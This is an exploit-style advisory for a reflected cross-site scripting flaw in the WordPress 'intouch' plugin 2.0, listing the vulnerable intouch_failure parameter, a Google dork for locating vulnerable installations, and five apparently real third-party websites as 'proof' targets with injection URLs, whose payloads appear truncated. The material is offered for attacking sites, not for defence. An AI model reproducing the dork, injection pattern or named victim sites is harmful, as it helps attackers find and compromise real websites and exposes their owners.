WordPress Intouch跨站脚本漏洞

######################
# Exploit Title : WordPress intouch Cross Site Scripting Vulnerability
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://wordpress.org/plugins/intouch/
# Google Dork : inurl:/wp-content/plugins/intouch/
# Date : 2013/01/01
# Tested on : Windows 8 , Linux
# Version : 2.0
# Software Link : http://downloads.wordpress.org/plugin/intouch.zip
######################
# Exploit : Cross Site Scripting
# Location :
http://[Target]/wp-content/plugins/intouch/intouch.js.php?intouch_failure=[XSS]
#
# Proof:
#
http://tresx4.net/esp/wp-content/plugins/intouch/intouch.js.php?intouch_failure=”/>
#
#
http://www.maltagop.net/wp-content/plugins/intouch/intouch.js.php?intouch_failure=”/>
#
#
http://www.sercongal.com/wp-content/plugins/intouch/intouch.js.php?intouch_failure=”/>
#
#
http://www.day-trading-mind.com/wp-content/plugins/intouch/intouch.js.php?intouch_failure=”/>
#
#
http://www.tauntoneasterrun.co.uk/wp-content/plugins/intouch/intouch.js.php?intouch_failure=”/>

######################
# discovered by : Spoof
######################